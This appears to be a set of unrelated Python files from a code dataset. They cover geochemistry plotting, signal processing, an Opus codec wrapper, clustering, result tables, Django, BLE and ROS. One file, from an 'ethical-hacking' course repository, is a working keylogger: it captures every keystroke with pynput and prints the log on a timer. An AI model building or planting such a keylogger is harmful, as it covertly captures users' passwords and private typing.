fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
#
# Enriched MORB
# ~~~~~~~~~~~~~
#
fltr = lambda c: "EMORB" in c.reservoir
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Ocean Island Basalts
# --------------------
#
fltr = lambda c: "OIB" in c.reservoir
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Continental Crust
# -----------------
#
# Bulk Continental Crust
# ~~~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir == "BulkContinentalCrust"
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Upper Continental Crust
# ~~~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir == "UpperContinentalCrust"
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Mid-Continental Crust
# ~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir == "MidContinentalCrust"
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Lower Continental Crust
# ~~~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir == "LowerContinentalCrust"
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Shales
# ------
#
fltr = lambda c: "Shale" in c.reservoir
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Composition List
# -----------------
#
# |refcomps|
#
# .. seealso::
#
# Examples:
# `Normalisation <../examples/geochem/normalization.html>`__
#
| StarcoderdataPython |
1607158 | <reponame>carlsummer/python_developer_tools
# !/usr/bin/env python
# -- coding: utf-8 --
# @Author zengxiaohui
# Datatime:4/29/2021 8:41 PM
# @File:time_utils
import datetime
import time
def get_time_stamp():
"""获取毫秒级的时间"""
ct = time.time()
local_time = time.localtime(ct)
data_head = time.strftime("%Y-%m-%d %H:%M:%S", local_time)
data_secs = (ct - int(ct)) * 1000
time_stamp = "%s.%03d" % (data_head, data_secs)
return time_stamp
def str2datetime(dd):
"""
# str转时间格式:
dd = '2019-03-17 11:00:00'
dd = datetime.datetime.strptime(dd, "%Y-%m-%d %H:%M:%S")
print(dd,type(dd))
"""
return datetime.datetime.strptime(dd, "%Y-%m-%d %H:%M:%S")
def datetime2str(mtime):
"""datetime格式转str"""
return mtime.strftime("%Y-%m-%d %H:%M:%S") | StarcoderdataPython |
4841837 | <gh_stars>1-10
from scipy.fft import fft, fftfreq
import numpy as np
from scipy import signal
import matplotlib.pyplot as plt
from scipy.signal import hann
# Number of sample points
N = 1024
# sample spacing
Fs = 48000
T = 1.0 / Fs
#X axis
x = np.linspace(0.0, N*T, N, endpoint=False)
#Signal
y = np.cos(2.0*np.pi*x*5000)
#Window
w = hann(N)
#FFT of signal without window
yf = fft(y)
#FFT of signal with window
ywf = fft(y*w)
# Used to calculate bins
# We only grab the first half of the bins
# because we don't need the negative frequencies
xf = np.arange(0,Fs/2,Fs/N)
plt.semilogy(xf[0:int(N/2)], 2.0/N * np.abs(yf[0:int(N/2)]), '-b')
plt.semilogy(xf[0:int(N/2)], 2.0/N * np.abs(ywf[0:int(N/2)]), '-r')
plt.legend(['FFT without Window', 'FFT with Window'])
plt.grid()
plt.show()
| StarcoderdataPython |
3221156 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""High-level interface to a opus decoder functions"""
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2012, SvartalF'
__license__ = 'BSD 3-Clause License'
import opuslib.api.decoder
import opuslib.api.encoder
import opuslib.api.ctl
import opuslib.constants
class Decoder(object):
def __init__(self, fs, channels):
"""
Parameters:
fs : sampling rate
channels : number of channels
"""
self._fs = fs
self._channels = channels
self._state = opuslib.api.decoder.create(fs, channels)
def __del__(self):
if hasattr(self, '_state'):
# Destroying state only if __init__ completed successfully
opuslib.api.decoder.destroy(self._state)
def reset_state(self):
"""
Resets the codec state to be equivalent to a freshly initialized state
"""
opuslib.api.decoder.opuslib.api.ctl(
self._state, opuslib.api.ctl.reset_state)
def decode(self, data, frame_size, decode_fec=False):
return opuslib.api.decoder.decode(
self._state, data, len(data), frame_size, decode_fec,
channels=self._channels)
def decode_float(self, data, frame_size, decode_fec=False):
return opuslib.api.decoder.decode_float(
self._state, data, len(data), frame_size, decode_fec,
channels=self._channels)
# CTL interfaces
_get_final_range = lambda self: opuslib.api.decoder.opuslib.api.ctl(
self._state, opuslib.api.ctl.get_final_range)
final_range = property(_get_final_range)
_get_bandwidth = lambda self: opuslib.api.decoder.opuslib.api.ctl(
self._state, opuslib.api.ctl.get_bandwidth)
bandwidth = property(_get_bandwidth)
_get_pitch = lambda self: opuslib.api.decoder.opuslib.api.ctl(
self._state, opuslib.api.ctl.get_pitch)
pitch = property(_get_pitch)
_get_lsb_depth = lambda self: opuslib.api.decoder.opuslib.api.ctl(
self._state, opuslib.api.ctl.get_lsb_depth)
_set_lsb_depth = lambda self, x: opuslib.api.decoder.opuslib.api.ctl(
self._state, opuslib.api.ctl.set_lsb_depth, x)
lsb_depth = property(_get_lsb_depth, _set_lsb_depth)
_get_gain = lambda self: opuslib.api.decoder.opuslib.api.ctl(
self._state, opuslib.api.ctl.get_gain)
_set_gain = lambda self, x: opuslib.api.decoder.opuslib.api.ctl(
self._state, opuslib.api.ctl.set_gain, x)
gain = property(_get_gain, _set_gain)
class Encoder(object):
def __init__(self, fs, channels, application):
"""
Parameters:
fs : sampling rate
channels : number of channels
"""
if application in opuslib.constants.APPLICATION_TYPES_MAP.keys():
application = opuslib.constants.APPLICATION_TYPES_MAP[application]
elif application in opuslib.constants.APPLICATION_TYPES_MAP.values():
pass # Nothing to do here
else:
raise ValueError(
"`application` value must be in 'voip', 'audio' or "
"'restricted_lowdelay'")
self._fs = fs
self._channels = channels
self._application = application
self._state = opuslib.api.encoder.create(fs, channels, application)
def __del__(self):
if hasattr(self, '_state'):
# Destroying state only if __init__ completed successfully
opuslib.api.encoder.destroy(self._state)
def reset_state(self):
"""
Resets the codec state to be equivalent to a freshly initialized state
"""
opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.reset_state)
def encode(self, data, frame_size):
return opuslib.api.encoder.encode(
self._state, data, frame_size, len(data))
def encode_float(self, data, frame_size, decode_fec=False):
return opuslib.api.encoder.encode_float(
self._state, data, frame_size, len(data))
# CTL interfaces
_get_final_range = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_final_range)
final_range = property(_get_final_range)
_get_bandwidth = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_bandwidth)
bandwidth = property(_get_bandwidth)
_get_pitch = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_pitch)
pitch = property(_get_pitch)
_get_lsb_depth = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_lsb_depth)
_set_lsb_depth = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_lsb_depth, x)
lsb_depth = property(_get_lsb_depth, _set_lsb_depth)
_get_complexity = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_complexity)
_set_complexity = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_complexity, x)
complexity = property(_get_complexity, _set_complexity)
_get_bitrate = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_bitrate)
_set_bitrate = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_bitrate, x)
bitrate = property(_get_bitrate, _set_bitrate)
_get_vbr = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_vbr)
_set_vbr = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_vbr, x)
vbr = property(_get_vbr, _set_vbr)
_get_vbr_constraint = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_vbr_constraint)
_set_vbr_constraint = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_vbr_constraint, x)
vbr_constraint = property(_get_vbr_constraint, _set_vbr_constraint)
_get_force_channels = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_force_channels)
_set_force_channels = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_force_channels, x)
force_channels = property(_get_force_channels, _set_force_channels)
_get_max_bandwidth = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_max_bandwidth)
_set_max_bandwidth = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_max_bandwidth, x)
max_bandwidth = property(_get_max_bandwidth, _set_max_bandwidth)
_set_bandwidth = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_bandwidth, x)
bandwidth = property(None, _set_bandwidth)
_get_signal = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_signal)
_set_signal = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_signal, x)
signal = property(_get_signal, _set_signal)
_get_application = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_application)
_set_application = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_application, x)
application = property(_get_application, _set_application)
_get_sample_rate = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_sample_rate)
sample_rate = property(_get_sample_rate)
_get_lookahead = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_lookahead)
lookahead = property(_get_lookahead)
_get_inband_fec = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_inband_fec)
_set_inband_fec = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_inband_fec)
inband_fec = property(_get_inband_fec, _set_inband_fec)
_get_packet_loss_perc = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_packet_loss_perc)
_set_packet_loss_perc = \
lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.set_packet_loss_perc, x)
packet_loss_perc = property(_get_packet_loss_perc, _set_packet_loss_perc)
_get_dtx = lambda self: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_dtx)
_set_dtx = lambda self, x: opuslib.api.encoder.ctl(
self._state, opuslib.api.ctl.get_dtx, x)
| StarcoderdataPython |
1735686 | <reponame>raminjafary/ethical-hacking<filename>src/14 keylogger/keylogger_3.py
#!/usr/bin/python
import pynput.keyboard
import threading
log = ""
def process_key_press(key):
global log
try:
log = log + str(key.char)
except AttributeError:
if key == key.space:
log = log + " "
else:
log = log +" " + str(key) + " "
print (log)
def report():
global log
print (log)
log = ""
timer = threading.Timer(5,report)
timer.start()
keyboard_listener=pynput.keyboard.Listener(on_press=process_key_press)
with keyboard_listener:
report()
keyboard_listener.join()
| StarcoderdataPython |
17774 | <reponame>HangeZoe/django-todo-list<filename>todolist/wsgi.py
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'todolist.settings')
application = get_wsgi_application()
| StarcoderdataPython |
142254 | <reponame>Wanghp119/py-st-dbscan
from datetime import timedelta
from geopy.distance import great_circle
def st_dbscan(df, spatial_threshold, temporal_threshold, min_neighbors):
"""
Python st-dbscan implementation.
INPUTS:
df={o1,o2,...,on} Set of objects
spatial_threshold = Maximum geographical coordinate (spatial) distance
value
temporal_threshold = Maximum non-spatial distance value
min_neighbors = Minimun number of points within Eps1 and Eps2 distance
OUTPUT:
C = {c1,c2,...,ck} Set of clusters
"""
cluster_label = 0
noise = -1
unmarked = 777777
stack = []
# initialize each point with unmarked
df['cluster'] = unmarked
# for each point in database
for index, point in df.iterrows():
if df.loc[index]['cluster'] == unmarked:
neighborhood = retrieve_neighbors(index, df, spatial_threshold,
temporal_threshold)
if len(neighborhood) < min_neighbors:
df.set_value(index, 'cluster', noise)
else: # found a core point
cluster_label += 1
# assign a label to core point
df.set_value(index, 'cluster', cluster_label)
# assign core's label to its neighborhood
for neig_index in neighborhood:
df.set_value(neig_index, 'cluster', cluster_label)
stack.append(neig_index) # append neighborhood to stack
# find new neighbors from core point neighborhood
while len(stack) > 0:
current_point_index = stack.pop()
new_neighborhood = retrieve_neighbors(
current_point_index, df, spatial_threshold,
temporal_threshold)
# current_point is a new core
if len(new_neighborhood) >= min_neighbors:
for neig_index in new_neighborhood:
neig_cluster = df.loc[neig_index]['cluster']
if all([neig_cluster != noise,
neig_cluster == unmarked]):
# TODO: verify cluster average
# before add new point
df.set_value(neig_index, 'cluster',
cluster_label)
stack.append(neig_index)
return df
def retrieve_neighbors(index_center, df, spatial_threshold, temporal_threshold):
neigborhood = []
center_point = df.loc[index_center]
# filter by time
min_time = center_point['date_time'] - timedelta(seconds=temporal_threshold)
max_time = center_point['date_time'] + timedelta(seconds=temporal_threshold)
df = df[(df['date_time'] >= min_time) & (df['date_time'] <= max_time)]
# filter by distance
for index, point in df.iterrows():
if index != index_center:
distance = great_circle(
(center_point['latitude'], center_point['longitude']),
(point['latitude'], point['longitude'])).meters
if distance <= spatial_threshold:
neigborhood.append(index)
return neigborhood
| StarcoderdataPython |
107962 | <gh_stars>1-10
import argparse
import numpy as np
import os
import pandas as pd
def main(num_tasks_all,
datasets,
algorithms,
num_seeds,
num_init_tasks,
num_epochs,
save_frequency,
results_root):
if len(num_tasks_all) == 1:
num_tasks_all = num_tasks_all * len(datasets)
if isinstance(datasets, str):
datasets = [datasets]
if isinstance(algorithms, str):
algorithms = [algorithms]
name_order = {'ER Dynamic': 0,
'ER Compositional': 1,
'ER Joint': 2,
'ER Nocomponents': 3,
'EWC Dynamic': 4,
'EWC Compositional': 5,
'EWC Joint': 6,
'EWC Nocomponents': 7,
'VAN Dynamic': 8,
'VAN Compositional': 9,
'VAN Joint': 10,
'VAN Nocomponents': 11,
'FM Dynamic': 12,
'FM Compositional': 13}
version_map = {'Dynamic': 'Dyn. + Comp.',
'Compositional': 'Compositional',
'Joint': 'Joint',
'Nocomponents': 'No Comp.'}
ylabel_map = {'acc': 'Accuracy', 'loss': 'Loss'}
jumpstart_vals_all_datasets = {}
finetuning_vals_all_datasets = {}
forward_transfer_vals_all_datasets = {}
final_vals_all_datasets = {}
jumpstart_errs_all_datasets = {}
finetuning_errs_all_datasets = {}
forward_transfer_errs_all_datasets = {}
final_errs_all_datasets = {}
for i, dataset in enumerate(datasets):
num_tasks = num_tasks_all[i]
jumpstart_vals = {}
finetuning_vals = {}
forward_transfer_vals = {}
final_vals = {}
jumpstart_vals_all_algos = {}
finetuning_vals_all_algos = {}
forward_transfer_vals_all_algos = {}
final_vals_all_algos = {}
jumpstart_errs_all_algos = {}
finetuning_errs_all_algos = {}
forward_transfer_errs_all_algos = {}
final_errs_all_algos = {}
names = []
for algorithm in algorithms:
jumpstart_vals[algorithm] = {}
finetuning_vals[algorithm] = {}
forward_transfer_vals[algorithm] = {}
final_vals[algorithm] = {}
for seed in range(num_seeds):
iter_cnt = 0
prev_components = 4
for task_id in range(num_tasks):
results_dir = os.path.join(results_root, dataset, algorithm, 'seed_{}'.format(seed), 'task_{}'.format(task_id))
if 'dynamic' in algorithm and task_id >= num_init_tasks:
with open(os.path.join(results_dir, 'num_components.txt')) as f:
line = f.readline()
curr_components = int(line.lstrip('final components: '))
keep_component = curr_components > prev_components
prev_components = curr_components
with open(os.path.join(results_dir, 'log.txt')) as f:
##### JUMPSTART #########
next(f)
for task in range(task_id):
next(f)
line = f.readline()
line = line.rstrip('\n')
i_0 = len('\ttask: {}\t'.format(task_id))
while i_0 != -1:
i_f = line.find(':', i_0)
key = line[i_0 : i_f]
if task_id == 0 and seed == 0:
jumpstart_vals[algorithm][key] = np.zeros((num_seeds, num_tasks))
finetuning_vals[algorithm][key] = np.zeros((num_seeds, num_tasks))
forward_transfer_vals[algorithm][key] = np.zeros((num_seeds, num_tasks))
final_vals[algorithm][key] = np.zeros((num_seeds, num_tasks))
if key not in jumpstart_vals_all_algos:
jumpstart_vals_all_algos[key] = []
finetuning_vals_all_algos[key] = []
forward_transfer_vals_all_algos[key] = []
final_vals_all_algos[key] = []
jumpstart_errs_all_algos[key] = []
finetuning_errs_all_algos[key] = []
forward_transfer_errs_all_algos[key] = []
final_errs_all_algos[key] = []
if key not in jumpstart_vals_all_datasets:
jumpstart_vals_all_datasets[key] = []
finetuning_vals_all_datasets[key] = []
forward_transfer_vals_all_datasets[key] = []
final_vals_all_datasets[key] = []
jumpstart_errs_all_datasets[key] = []
finetuning_errs_all_datasets[key] = []
forward_transfer_errs_all_datasets[key] = []
final_errs_all_datasets[key] = []
i_0 = line.find(key + ': ', i_0) + len(key + ': ')
i_f = line.find('\t', i_0)
substr = line[i_0 : i_f] if i_f != -1 else line[i_0:]
try:
val = float(substr)
except:
if keep_component:
val = float(substr.split(',')[0].lstrip('('))
else:
val = float(substr.split(',')[1].rstrip(')'))
jumpstart_vals[algorithm][key][seed, task_id] = val
i_0 = i_f if i_f == - 1 else i_f + 1
if task_id < num_init_tasks - 1:
continue
###### IGNORE FINTEUNING PROCESS #########
if '_compositional' in algorithm or '_dynamic' in algorithm:
stop_at = num_epochs - save_frequency
else:
stop_at = num_epochs
for epoch in range(1, stop_at, save_frequency):
try:
next(f) # epochs: 100, training task: 9
except StopIteration:
print(dataset, algorithm, seed, task_id, epoch)
raise
for task in range(task_id + 1):
next(f)
###### FETUNING ###########
next(f)
if task_id == num_init_tasks - 1:
start_loop_at = 0
elif task_id == num_tasks - 1 and '_compositional' not in algorithm and '_dynamic' not in algorithm:
start_loop_at = 0
else:
start_loop_at = task_id
for task in range(start_loop_at):
next(f)
for task in range(start_loop_at, task_id + 1):
line = f.readline()
line = line.rstrip('\n')
i_0 = len('\ttask: {}\t'.format(task))
while i_0 != -1:
i_f = line.find(':', i_0)
key = line[i_0 : i_f]
i_0 = line.find(key + ': ', i_0) + len(key + ': ')
i_f = line.find('\t', i_0)
substr = line[i_0 : i_f] if i_f != -1 else line[i_0:]
try:
val = float(substr)
except:
if keep_component:
val = float(substr.split(',')[0].lstrip('('))
else:
val = float(substr.split(',')[1].rstrip(')'))
if task == task_id or task_id == num_init_tasks - 1:
finetuning_vals[algorithm][key][seed, task] = val
if task_id == num_tasks - 1 and '_compositional' not in algorithm and '_dynamic' not in algorithm:
final_vals[algorithm][key][seed, task] = val
i_0 = i_f if i_f == - 1 else i_f + 1
####### FORWARD TRANSFER #######
if ('_compositional' in algorithm or '_dynamic' in algorithm) and task_id != num_init_tasks - 1:
if task_id == num_tasks - 1:
start_loop_at = 0
next(f)
for task in range(start_loop_at):
next(f)
for task in range(start_loop_at, task_id + 1):
line = f.readline()
line = line.rstrip('\n')
i_0 = len('\ttask: {}\t'.format(task))
while i_0 != -1:
i_f = line.find(':', i_0)
key = line[i_0 : i_f]
i_0 = line.find(key + ': ', i_0) + len(key + ': ')
i_f = line.find('\t', i_0)
substr = line[i_0 : i_f] if i_f != -1 else line[i_0:]
try:
val = float(substr)
except:
if keep_component:
val = float(substr.split(',')[0].lstrip('('))
else:
val = float(substr.split(',')[1].rstrip(')'))
if task == task_id:
forward_transfer_vals[algorithm][key][seed, task] = val
if task_id == num_tasks - 1:
final_vals[algorithm][key][seed][task] = val
i_0 = i_f if i_f == - 1 else i_f + 1
else:
for task in range(start_loop_at, task_id + 1):
for key in finetuning_vals[algorithm]:
forward_transfer_vals[algorithm][key][seed, task] = finetuning_vals[algorithm][key][seed, task]
key = 'acc'
if key in jumpstart_vals[algorithm]:
jumpstart_vals_all_algos[key].append(jumpstart_vals[algorithm][key].mean())
jumpstart_errs_all_algos[key].append(jumpstart_vals[algorithm][key].mean(axis=1).std())
finetuning_vals_all_algos[key].append(finetuning_vals[algorithm][key].mean())
finetuning_errs_all_algos[key].append(finetuning_vals[algorithm][key].mean(axis=1).std())
forward_transfer_vals_all_algos[key].append(forward_transfer_vals[algorithm][key].mean())
forward_transfer_errs_all_algos[key].append(forward_transfer_vals[algorithm][key].mean(axis=1).std())
final_vals_all_algos[key].append(final_vals[algorithm][key].mean())
final_errs_all_algos[key].append(final_vals[algorithm][key].mean(axis=1).std())
names.append(algorithm.split('_')[0].upper() + ' ' + algorithm.split('_')[1].title())
# names.append(algorithm)
idx = [x[0] for x in sorted(enumerate(names), key=lambda x:name_order[x[1]])]
names = np.array(names)[idx]
key = 'acc'
if key in jumpstart_vals_all_algos:
# Sort by names to group by base algorithm
jumpstart_vals_all_algos[key] = np.array(jumpstart_vals_all_algos[key])[idx]
jumpstart_errs_all_algos[key] = np.array(jumpstart_errs_all_algos[key])[idx] / np.sqrt(num_seeds)
finetuning_vals_all_algos[key] = np.array(finetuning_vals_all_algos[key])[idx]
finetuning_errs_all_algos[key] = np.array(finetuning_errs_all_algos[key])[idx] / np.sqrt(num_seeds)
forward_transfer_vals_all_algos[key] = np.array(forward_transfer_vals_all_algos[key])[idx]
forward_transfer_errs_all_algos[key] = np.array(forward_transfer_errs_all_algos[key])[idx] / np.sqrt(num_seeds)
final_vals_all_algos[key] = np.array(final_vals_all_algos[key])[idx]
final_errs_all_algos[key] = np.array(final_errs_all_algos[key])[idx] / np.sqrt(num_seeds)
if key in jumpstart_vals[algorithm]:
jumpstart_vals_all_datasets[key].append(jumpstart_vals_all_algos[key])
jumpstart_errs_all_datasets[key].append(jumpstart_errs_all_algos[key])
finetuning_vals_all_datasets[key].append(finetuning_vals_all_algos[key])
finetuning_errs_all_datasets[key].append(finetuning_errs_all_algos[key])
forward_transfer_vals_all_datasets[key].append(forward_transfer_vals_all_algos[key])
forward_transfer_errs_all_datasets[key].append(forward_transfer_errs_all_algos[key])
final_vals_all_datasets[key].append(final_vals_all_algos[key])
final_errs_all_datasets[key].append(final_errs_all_algos[key])
key = 'acc'
if key in jumpstart_vals_all_datasets:
jumpstart_vals_all_datasets[key] = np.array(jumpstart_vals_all_datasets[key])
finetuning_vals_all_datasets[key] = np.array(finetuning_vals_all_datasets[key])
forward_transfer_vals_all_datasets[key] = np.array(forward_transfer_vals_all_datasets[key])
final_vals_all_datasets[key] = np.array(final_vals_all_datasets[key])
jumpstart_errs_all_datasets[key] = np.array(jumpstart_errs_all_datasets[key])
finetuning_errs_all_datasets[key] = np.array(finetuning_errs_all_datasets[key])
forward_transfer_errs_all_datasets[key] = np.array(forward_transfer_errs_all_datasets[key])
final_errs_all_datasets[key] = np.array(final_errs_all_datasets[key])
# Group by base algorithm
base_counts = np.array([sum(x.startswith('ER') for x in names),
sum(x.startswith('EWC') for x in names),
sum(x.startswith('VAN') for x in names),
sum(x.startswith('FM') for x in names)])
base_nocomponents_pos = np.cumsum(base_counts) - 1
base_column = (['ER'] * base_counts[0]
+ ['EWC'] * base_counts[1]
+ ['VAN'] * base_counts[2]
+ ['FM'] * base_counts[3]
)
best_idx_i = np.array([final_vals_all_datasets[key][:, base_nocomponents_pos[i-1]+1 if i > 0 else 0:base_nocomponents_pos[i]+1].argmax(axis=1) + (base_nocomponents_pos[i-1]+1 if i > 0 else 0) for i in range(len(base_counts)-1)])
best_idx_j = np.tile(np.arange(len(datasets)), (len(base_counts)-1, 1))
best_mask = np.zeros_like(final_vals_all_datasets[key].T, dtype=bool)
best_mask[best_idx_i, best_idx_j] = True
columns = ['Base', 'Algorithm'] + datasets
results_df = pd.DataFrame(columns=columns)
for name, base, row_val, row_err, row_best in zip(names, base_column, final_vals_all_datasets[key].T, final_errs_all_datasets[key].T, best_mask):
algo = version_map[name.split(' ')[1]]
row_dict = {'Base': base,'Algorithm': algo}
row_val *= 100
row_err *= 100
row_dict.update({
d: '**{:.1f}\u00B1{:.1f}**%'.format(val, err) if best else
'{:.1f}\u00B1{:.1f}%'.format(val, err) for d, val, err, best in zip(datasets, row_val, row_err, row_best)
})
results_df = results_df.append(row_dict, ignore_index=True)
results_df.set_index(['Base'],inplace=True)
print(results_df.to_markdown() + '\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create markdown results table lifelong compositional learning')
parser.add_argument('-T', '--num_tasks', dest='num_tasks', default=10, type=int, nargs='+')
parser.add_argument('-d', '--datasets', dest='datasets', default='MNIST',
choices=['MNIST', 'Fashion', 'CIFAR', 'CUB', 'Omniglot',
'Landmine', 'LondonSchool', 'FacialRecognition',
'MNISTPixels'],
nargs='+')
parser.add_argument('-alg', '--algorithms', dest='algos', default='er_compositional',
choices=['er_compositional', 'ewc_compositional', 'van_compositional',
'er_joint', 'ewc_joint', 'van_joint',
'er_nocomponents', 'ewc_nocomponents', 'van_nocomponents',
'er_dynamic', 'ewc_dynamic', 'van_dynamic',
'fm_compositional', 'fm_dynamic'],
nargs='+')
parser.add_argument('-e', '--num_epochs', dest='num_epochs', default=100, type=int)
parser.add_argument('-sf', '--save_frequency', dest='save_frequency', default=1, type=int)
parser.add_argument('-k', '--init_tasks', dest='num_init_tasks', default=4, type=int)
parser.add_argument('-n', '--num_seeds', dest='num_seeds', default=1, type=int)
parser.add_argument('-r', '--results_root', dest='results_root', default='./tmp/results')
args = parser.parse_args()
main(args.num_tasks,
args.datasets,
args.algos,
args.num_seeds,
args.num_init_tasks,
args.num_epochs,
args.save_frequency,
args.results_root) | StarcoderdataPython |
3229940 | <filename>backend/user_application/sources/serializers/user_serializers.py
from rest_framework import serializers
class UserSerializer(serializers.Serializer):
id = serializers.IntegerField()
username = serializers.CharField()
email = serializers.EmailField()
date_joined = serializers.DateTimeField()
last_login = serializers.DateTimeField()
class UserRegisterSerializer(serializers.Serializer):
email = serializers.EmailField()
password = serializers.CharField()
| StarcoderdataPython |
1653431 | # Provide an "eval()" service over BLE UART.
from adafruit_ble import BLERadio
from adafruit_ble.advertising.standard import ProvideServicesAdvertisement
from adafruit_ble.services.nordic import UARTService
from adafruit_circuitplayground import cp
import time
ble = BLERadio()
uart = UARTService()
advertisement = ProvideServicesAdvertisement(uart)
ble.start_advertising(advertisement)
print("Waiting to connect")
while True:
while not ble.connected:
pass
result = (cp.acceleration.x, cp.acceleration.y, cp.acceleration.z)
if result:
try:
uart.write(str(result).encode("utf-8"))
except Exception as e:
print(repr(e))
time.sleep(0.5) | StarcoderdataPython |
4818308 | #!/usr/bin/env python
"""
Copyright (c) 2011, <NAME>, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Willow Garage, Inc. nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES LOSS OF USE, DATA, OR PROFITS OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
import roslib; roslib.load_manifest("interactive_markers")
import rospy
import copy
from interactive_markers.interactive_marker_server import *
from interactive_markers.menu_handler import *
from geometry_msgs.msg import *
from visualization_msgs.msg import *
from tf import transformations
from tf import TransformListener
from jsk_2015_05_baxter_apc.msg import SetObjectPositionArray, WorkOrderArray
import rospkg
import yaml
server = None
